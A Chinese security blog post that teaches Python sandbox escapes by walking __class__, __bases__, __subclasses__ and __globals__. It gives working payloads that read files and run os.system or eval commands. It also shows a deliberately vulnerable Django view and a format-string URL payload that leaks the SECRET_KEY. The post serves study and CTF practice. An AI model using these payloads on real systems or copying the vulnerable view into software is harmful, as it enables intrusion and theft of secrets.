用python继承链搞事情

本文首发于先知社区

前言

继承链这个这个词是我自己发明的。看到有的师傅博客中将它称为egg或者ssti,但是我喜欢叫它继承链因为感觉很生动。最早遇到这种姿势是在学习python bypass沙盒的时候。当时不是很理解形如().__class__.__bases__[0].__subclasses__()的意思。学习一段时间后,我决定来总结一下构造继承链的方法,并且用此方法在django有格式化字符串漏洞的情况下读取配置文件(灵感来自p师傅博客)。

基础知识

__bases__

返回一个类直接所继承的类(元组形式)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
class Base1:
def __init__(self):
pass
class Base2:
def __init__(self):
pass
class test(Base1, Base2):
pass
class test2(test):
pass
print test.__bases__
print test2.__bases__
"""
(<class __main__.Base1 at 0x0322ADF8>, <class __main__.Base2 at 0x0322AE30>)
(<class __main__.test at 0x0322AE68>,)
"""

在看别人文章时发现__mro__和__bases__用法相同,两者具体区别, 暂时留个坑。

一些情况下也可用__base__直接返回单个的类

__class__

返回一个实例所属的类

1
2
3
4
5
6
7
8
9
class Base:
def __init__(self):
pass
obj = Base()
print obj.__class__
"""
__main__.Base
"""

__globals__

使用方式是 函数名.__globals__,返回一个当前空间下能使用的模块,方法和变量的字典。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#coding:utf-8
import os
var = 2333
def fun():
pass
class test:
def __init__(self):
pass
print test.__init__.__globals__
"""
{'__builtins__': <module '__builtin__' (built-in)>, '__file__': 'backup.py', '__package__': None, 'fun': <function fun at 0x7f542e44b5f0>, 'test': <class __main__.test at 0x7f542e43b598>, 'var': 2333, '__name__': '__main__', 'os': <module 'os' from '/usr/lib/python2.7/os.pyc'>, '__doc__': None}
"""

__subclasses__()

获取一个类的子类,返回的是一个列表

1
2
3
4
5
6
7
8
9
10
11
class Base1(object):
def __init__(self):
pass
class test(Base1):
pass
print Base1.__subclasses__()
"""
[<class '__main__.test'>]
"""

__builtin__ && __builtins__

python中可以直接运行一些函数,例如int(),list()等等。这些函数可以在__builtins__中可以查到。查看的方法是dir(__builtins__)。在控制台中直接输入__builtins__会看到如下情况

1
2
3
#python2
>>> __builtins__
<module '__builtin__' (built-in)>

ps:在py3中__builtin__被换成了builtin

__builtin____builtins__之间是什么关系呢?

1、在主模块main中,__builtins__是对内建模块__builtin__本身的引用,即__builtins__完全等价于__builtin__,二者完全是一个东西,不分彼此。

2、非主模块main中,__builtins__仅是对__builtin__.__dict__的引用,而非__builtin__本身

继承链bypass沙盒

用file对象读取文件

构造继承链的一种思路是:

  1. 随便找一个内置类对象用__class__拿到他所对应的类
  2. __bases__拿到基类(<class 'object'>
  3. __subclasses__()拿到子类列表
  4. 在子类列表中直接寻找可以利用的类

一言敝之

1
2
().__class__.__base__.__subclasses__()
().__class__.__bases__[0].__subclasses__()

可以看到列表里面有一坨,这里只看file对象。

1
[...,<type 'file'>, ...]

查找file位置。

1
2
3
4
5
6
7
8
#coding:utf-8
search = 'file'
num = 0
for i in ().__class__.__bases__[0].__subclasses__():
if 'file' in str(i):
print num
num += 1

<type 'file'>在第40位。().__class__.__bases__[0].__subclasses__()[40]

dir来看看内置的方法

1
dir(().__class__.__bases__[0].__subclasses__()[40])
1
['__class__', '__delattr__', '__doc__', '__enter__', '__exit__', '__format__', '__getattribute__', '__hash__', '__init__', '__iter__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'close', 'closed', 'encoding', 'errors', 'fileno', 'flush', 'isatty', 'mode', 'name', 'newlines', 'next', 'read', 'readinto', 'readline', 'readlines', 'seek', 'softspace', 'tell', 'truncate', 'write', 'writelines', 'xreadlines']

所以最终的payload是

1
().__class__.__bases__[0].__subclasses__()[40]('filename').readlines()

然后用同样的手法可以得到__mro__形式下的payload

1
().__class__.__mro__[1].__subclasses__()[40]('filename').readlines()

这种方法等价于

1
file('backup.py').readlines()

但是python3已经移除了file。所以第一种方法只能在py2中用。

用内置模块执行命令

第二种方法接着第一种的思路接着探索。第一种止步于把内置的对象列举出来,其实可以用__globals__更深入的去看每个类可以调用的东西(包括模块,类,变量等等),万一有os这种东西就赚了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#coding:utf-8
search = 'os' #也可以是其他你想利用的模块
num = -1
for i in ().__class__.__bases__[0].__subclasses__():
num += 1
try:
if search in i.__init__.__globals__.keys():
print(i, num)
except:
pass
"""
(<class 'site._Printer'>, 72)
(<class 'site.Quitter'>, 77)
"""
1
2
().__class__.__mro__[1].__subclasses__()[77].__init__.__globals__['os'].system('whoami')
().__class__.__mro__[1].__subclasses__()[72].__init__.__globals__['os'].system('whoami')

不过很可惜上述的方法也只能在py2中使用。

第三种

那有没有通吃py2和py3的方法呢?答案是有的,就用上面__builtins__来搞事。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#coding:utf-8
search = '__builtins__'
num = -1
for i in ().__class__.__bases__[0].__subclasses__():
num += 1
try:
if search in i.__init__.__globals__.keys():
print(i, num)
except:
pass
"""
<class '_frozen_importlib._ModuleLock'> 64
#省略一堆
"""

于是乎

py3

1
().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['__builtins__']['eval']("__import__('os').system('whoami')")

py2

1
().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').system('whoami')")

继承链读django配置信息

p师傅的利用格式化字符串漏洞泄露Django配置信息一文中给了两个payload都是无登陆情况下读到django配置信息,我们可以用上面所述方法找到更多的payload。

测试代码如下

1
2
3
4
5
from django.http import HttpResponse
def search(request):
template = 'Hello {user}, This is your search: ' + request.GET.get('keyword')
return HttpResponse(template.format(user=request.user))

因为是无登陆情况,所以requests.User里面的对象是AnonymousUser的实例

1
2
3
4
class AnonymousUser(object):
#省略
_groups = EmptyManager(Group)
_user_permissions = EmptyManager(Permission)

观察到_groups属性是一个EmptyManager对象。

跟踪EmptyManager来到manger.py

1
2
3
4
5
6
7
8
9
10
##省略
from django.db.models.query import QuerySet
##省略
class EmptyManager(Manager):
def __init__(self, model):
super(EmptyManager, self).__init__()
self.model = model
def get_queryset(self):
return super(EmptyManager, self).get_queryset().none()

跟踪QuerySet来到query.py

1
2
3
4
5
6
7
8
##省略
from django.conf import settings
##省略
class QuerySet(object):
"""
Represents a lazy database lookup for a set of objects.
"""
def __init__(self, model=None, query=None, using=None, hints=None):

settings里面就是django的配置了。

将上面的跟踪一步一步转换成payload就是

拿到EmptyManager对象:user._groups.__class__

拿到QuerySet对象:user._groups.__class__.__base__.__init__.__globals__[QuerySet]

拿到SECRET_KEY

{user._groups.__class__.__base__.__init__.__globals__[QuerySet].__init__.__globals__[settings].SECRET_KEY}

所以最后的payload是

1
http://127.0.0.1:8000/search?keyword={user._groups.__class__.__base__.__init__.__globals__[QuerySet].__init__.__globals__[settings].SECRET_KEY}

ps:有登陆的情况下构造过程中继承链的感觉更强烈,有兴趣的师傅可以试一下~

参考

http://bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/

https://www.anquanke.com/post/id/85571

http://www.cnblogs.com/iamstudy/articles/python_eval_and_bypass_sandbox_study.html

https://www.leavesongs.com/PENETRATION/python-string-format-vulnerability.html